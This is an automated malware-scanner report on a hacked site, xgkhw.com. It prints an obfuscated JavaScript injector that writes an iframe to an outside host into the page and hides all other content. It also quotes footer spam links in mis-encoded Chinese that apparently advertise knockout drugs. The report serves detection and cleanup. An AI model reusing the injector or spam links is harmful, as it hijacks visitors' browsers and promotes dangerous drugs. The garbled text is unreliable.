New scan:

Malware Scanner report for xgkhw.com

Malicious/Suspicious/Total urls checked
1/11/14
12 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "xgkhw.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=xgkhw.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.xgkhw.com/
200 OK
Content-Length: 14816
Content-Type: text/html
suspicious
Page code contains blacklisted domain: facuxtz.xgkhw.com

...[2327 bytes skipped]...
ime">2014-04-16</div>
<div class="comment list7">
<img s10</a> <a class="nextPage" href="/2.html">ÏÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://facuxtz.xgkhw.com/">»è˯ҩ¶àÉÙÇ®</a></li><li><a href="http://factvvy.xgkhw.com/">ºù«µºÄÄÀïÂòÃÔÒ©</a></li><li><a href="http://factbau.xgkhw.com/">ͳ·¬ÃÔÒ©</a></li><li><a href="http://factvaa.xgkhw.com/">ÁÙÏÄÄÄÀïÂòÃÔÒ©</a></li><li><a href="http://facbxzy.xgkhw.com/">ÏãÑÌÐÍÃÔÇéÏãË®</a></li><li><a href="http://facuyth.xgkhw.com/">ÃÔ»èÏãÔõô¹ºÂò</a></li><li><
...[1989 bytes skipped]...

http://www.xgkhw.com/js.js
200 OK
Content-Length: 928
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="23'+'80" src="ht'+'tp://'+'ww'+'w.c'+'ls'+'k8.c'+'om/"></iframe></center>';
eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');");

try{
setInterval(function(){

try{
document.getElementById("div"+"All").style.display="no"+"ne";
}catch(e){}

for(var i=0;i<document.body.children.length;i++){
try{
var tagname = document.body.children[i].tagName;
var myid = document.body.children[i].id;
if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){
document.body.children[i].style.display="non"+"e";
}
}catch(e){}
}

},100);
}catch(e){}

Antivirus reports:

DrWeb
SCRIPT.Virus

http://www.xgkhw.com/tj.js
200 OK
Content-Length: 132
Content-Type: application/x-javascript
clean
http://www.xgkhw.com/2.html
200 OK
Content-Length: 14702
Content-Type: text/html
suspicious
Page code contains blacklisted domain: facxubx.xgkhw.com

...[2295 bytes skipped]...
<div class="content_time">2014-04-19</div>
<div class="comment list48848">
tPage" href="/3.html">ÏÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://facxubx.xgkhw.com/">¶Ä²©Ò©Ë®µ½ÄÄÀïÂò</a></li><li><a href="http://facttat.xgkhw.com/">¹þ¶û±õÃÔÒ©</a></li><li><a href="http://facqzyu.xgkhw.com/">ÅçÎíº£ÀÖÉñÄÄÀï³öÊÛ</a></li><li><a href="http://facthv.xgkhw.com/">ÄÄÀïÓÐÂé×íÒ©Âò</a></li><li><a href="http://facxxxy.xgkhw.com/">ÏãÑÌÃÔ»ÃÒ©¼Û¸ñ</a></li><li><a href="http://faczbuv.xgkhw.com/">ÌìË®ÃÔÒ©ÄÄÀïÂò</a></li><li&g
...[2009 bytes skipped]...

http://www.xgkhw.com/1.html
200 OK
Content-Length: 14746
Content-Type: text/html
suspicious
Page code contains blacklisted domain: facaqx.xgkhw.com

...[2268 bytes skipped]...
_title">¿ñº®ÃÎ</div>
<div class="content_time">2014-04-19</div>
<div class="comment list89481">
ÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://facaqx.xgkhw.com/">ÅçÎíÃÔÔÎÒ©</a></li><li><a href="http://factuaa.xgkhw.com/">Å­½­ÔõôÂòÃÔÒ©</a></li><li><a href="http://facyhqt.xgkhw.com/">ÄÄÓгöÊÛÅļçÃÔ»èÒ©</a></li><li><a href="http://factax.xgkhw.com/">Ôõô¹ºÂòÃÔÏã</a></li><li><a href="http://faczbuv.xgkhw.com/">ÌìË®ÃÔÒ©ÄÄÀïÂò</a></li><li><a href="http://facuxhv.xgkhw.com/">ÄÄÀïÓÐÃÔµ¹Ò©Âò</a></li><li><
...[2032 bytes skipped]...

http://www.xgkhw.com/3.html
200 OK
Content-Length: 14932
Content-Type: text/html
suspicious
Page code contains blacklisted domain: facuhhq.xgkhw.com

...[2281 bytes skipped]...
tle">×£ºê´ï</div>
<div class="content_time">2014-04-19</div>
<div class="comment list6621"href="/4.html">ÏÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://facuhhq.xgkhw.com/">ÃÔÔÎÏãÑ̳öÊÛ</a></li><li><a href="http://facbqzq.xgkhw.com/">ÄÄÀïÓÐÂôÕæµÄÈÃÈËʧȥ֪¾õµÄÒ©</a></li><li><a href="http://faczyzh.xgkhw.com/">ÄÄÀïÂòЧ¹û×îºÃµÄÉ߶¾</a></li><li><a href="http://facyzyz.xgkhw.com/">È¥ÄÄÀïÂò¹Ô¹ÔÌý»°Ë®</a></li><li><a href="http://facyvay.xgkhw.com/">ÅçÎí»èÃÔÒ©ÔõôÂòµ½</a></li><li><a href="http://facubb.xgkhw.com/">ÔõôÂòÌý»°Ò©Ë®</
...[2016 bytes skipped]...

http://www.xgkhw.com/4.html
200 OK
Content-Length: 14560
Content-Type: text/html
suspicious
Page code contains blacklisted domain: fachahq.xgkhw.com

...[2276 bytes skipped]...
t;Û³Ö®»±</div>
<div class="content_time">2014-04-19</div>
<div class="comment list652009">
l">ÏÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://fachahq.xgkhw.com/">ÅçÎí»èÃÔÅç¼Á</a></li><li><a href="http://facxbty.xgkhw.com/">ÄÄÀïÄÜÂòµ½ÃÔ»ÃÒ©Ë®</a></li><li><a href="http://facxhxz.xgkhw.com/">¿Ú·þÅļçÃÔ»ÃÒ©</a></li><li><a href="http://facxuu.xgkhw.com/">ÄÄÀï¿ÉÒÔÂòµ½ÕæµÄÃÔ»ÃÒ©</a></li><li><a href="http://factvy.xgkhw.com/">Âé×íÒ©µ½ÄÄÀïÂò</a></li><li><a href="http://facutuq.xgkhw.com/">ghbË®³öÊÛ</a></li><li
...[2028 bytes skipped]...

http://www.xgkhw.com/5.html
200 OK
Content-Length: 14822
Content-Type: text/html
suspicious
Page code contains blacklisted domain: facbubt.xgkhw.com

...[2301 bytes skipped]...
div class="content_time">2014-04-19</div>
<div class="comment list73">
<img src="hnextPage" href="/6.html">ÏÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://facbubt.xgkhw.com/">´ßÇéÒ©Ë®Åä·½</a></li><li><a href="http://faczux.xgkhw.com/">¹Ô¹ÔË®ÓÐÓÃÂð</a></li><li><a href="http://facuyaq.xgkhw.com/">ÃÔÔÎÒ©Ë®ÍøÕ¾</a></li><li><a href="http://faczzu.xgkhw.com/">»èÃÔÒ©ÈçºÎ¹ºÂò</a></li><li><a href="http://factyxx.xgkhw.com/">ÈÕ¿¦ÔòÔõôÂòÃÔÒ©</a></li><li><a href="http://facqhuv.xgkhw.com/">¶©¹ºÃÔ»êÏãÄÄÀïÂò</a></li><li><
...[2006 bytes skipped]...

http://www.xgkhw.com/6.html
200 OK
Content-Length: 14713
Content-Type: text/html
suspicious
Page code contains blacklisted domain: facuqyx.xgkhw.com

...[2284 bytes skipped]...
="content_title">Ï°ºêÊ¢</div>
<div class="content_time">2014-04-19</div>
<div class="coe" href="/7.html">ÏÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://facuqyx.xgkhw.com/">ÅçÎí¶Ä²©ÏãÑÌ</a></li><li><a href="http://facyqzv.xgkhw.com/">ÄÄÀïÓÐÂôÈÃÈË˵ʵ»°µÄÒ©Ë®</a></li><li><a href="http://facyvxu.xgkhw.com/">È¥ÄÄÂòÅçÎíÃÔ»èÒ©</a></li><li><a href="http://facutqx.xgkhw.com/">ÅçÎíÐͶÄÒ©</a></li><li><a href="http://facxzqq.xgkhw.com/">ÃÔ»êÏã¼Û¸ñ</a></li><li><a href="http://facqztq.xgkhw.com/">º£ÀÖÉñÈçºÎ¹ºÂò</a></li><li&
...[2013 bytes skipped]...

http://www.xgkhw.com/7.html
200 OK
Content-Length: 14907
Content-Type: text/html
suspicious
Page code contains blacklisted domain: fachava.xgkhw.com

...[2302 bytes skipped]...
<div class="content_title">ϵÊéÀÙ</div>
<div class="content_time">2014-04-19</div>
<a class="nextPage" href="/8.html">ÏÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://fachava.xgkhw.com/">»èÃÔÅç¼ÁÔõôÂòµ½</a></li><li><a href="http://facuqat.xgkhw.com/">fm2·Û¹ºÂò</a></li><li><a href="http://faczuqq.xgkhw.com/">ÃÔÏãÒ©ÄÄÀï¿ÉÒÔÂòµ½</a></li><li><a href="http://facqvyz.xgkhw.com/">ÄÄÀïÂôÌý»°Ò©</a></li><li><a href="http://facuatb.xgkhw.com/">ÄÄÓÐÌý»°·ÛÂô</a></li><li><a href="http://fachqyt.xgkhw.com/">ÔõôÂòµ½ÏãÑÌÃÔÒ©</a></li><li>
...[1995 bytes skipped]...

http://www.xgkhw.com/8.html
200 OK
Content-Length: 14758
Content-Type: text/html
suspicious
Page code contains blacklisted domain: facyxtt.xgkhw.com

...[2282 bytes skipped]...
;ÃØÑãɽ</div>
<div class="content_time">2014-04-19</div>
<div class="comment list88006">
/9.html">ÏÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://facyxtt.xgkhw.com/">Åļç»èÃÔÒ©ÄÄÀﹺÂò</a></li><li><a href="http://facthxv.xgkhw.com/">¹ãÖÝÄÄÀïÂòÃÔÒ©</a></li><li><a href="http://facbhhb.xgkhw.com/">ÄÄÀïÓÐÂô´ßÇéÒ©</a></li><li><a href="http://facztvy.xgkhw.com/">¹þ¶û±õÃÔÒ©ÄÄÀïÂò</a></li><li><a href="http://faczvbh.xgkhw.com/">ÃÔÒ©ÄÄÀﹺÂò</a></li><li><a href="http://fachtyq.xgkhw.com/">Ò½ÓÃÒÒÃÑÄÄÓгöÊÛ</a></li><
...[2022 bytes skipped]...

http://www.xgkhw.com/9.html
200 OK
Content-Length: 14705
Content-Type: text/html
suspicious
Page code contains blacklisted domain: faczvuz.xgkhw.com

...[2281 bytes skipped]...
> <div class="content_time">2014-04-19</div>
<div class="comment list445026">
0.html">ÏÂÒ»Ò³</a> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://faczvuz.xgkhw.com/">ÄÄÀïÂòÃÔÒ©</a></li><li><a href="http://faczhvz.xgkhw.com/">ɱÖíÒ©ÄÄÀïÓÐÂô</a></li><li><a href="http://factbbb.xgkhw.com/">±Ï½ÚÃÔÒ©</a></li><li><a href="http://facbhtu.xgkhw.com/">µ½ÄÄÀïÂò´ßÇéÏãË®</a></li><li><a href="http://fachzzz.xgkhw.com/">¹ºÂòÈýßòÂØƬ</a></li><li><a href="http://facbxqh.xgkhw.com/">ÃÔÇéÏãË®ÔõôÓÃ</a></li><li><a hre
...[2023 bytes skipped]...

http://www.xgkhw.com/10.html
200 OK
Content-Length: 14799
Content-Type: text/html
suspicious
Page code contains blacklisted domain: facbyxa.xgkhw.com

...[2282 bytes skipped]...
le">×£º­Ñô</div>
<div class="content_time">2014-04-19</div>
<div class="comment list42915n class="current">10</span> </div>
</div>


</div>
<div id="footer">
<div class="friendlink">
<ul>
<li><a href="http://facbyxa.xgkhw.com/">Å®ÐÔ´ßÇéÒ©ÈçºÎ¹ºÂò</a></li><li><a href="http://fachxbb.xgkhw.com/">¹Ô¹Ô·ÛÔõô¹ºÂò</a></li><li><a href="http://facxqut.xgkhw.com/">ÃԻüÁÔõôÂò</a></li><li><a href="http://fachtzt.xgkhw.com/">ÍâÓÃÒ½ÓÃÒÒÃÑ</a></li><li><a href="http://factbzx.xgkhw.com/">¸Ê×ÎÃÔÒ©</a></li><li><a href="http://fachqyq.xgkhw.com/">ÏãÑÌÃÔÒ©ÔõôÂò</a></li><li><a
...[2015 bytes skipped]...

http://www.xgkhw.com/test404page.js
200 OK
Content-Length: 0
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: xgkhw.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xgkhw.com
Referer: http://www.google.com/search?q=xgkhw.com

Result:
The result is similar to the first query. There are no suspicious redirects found.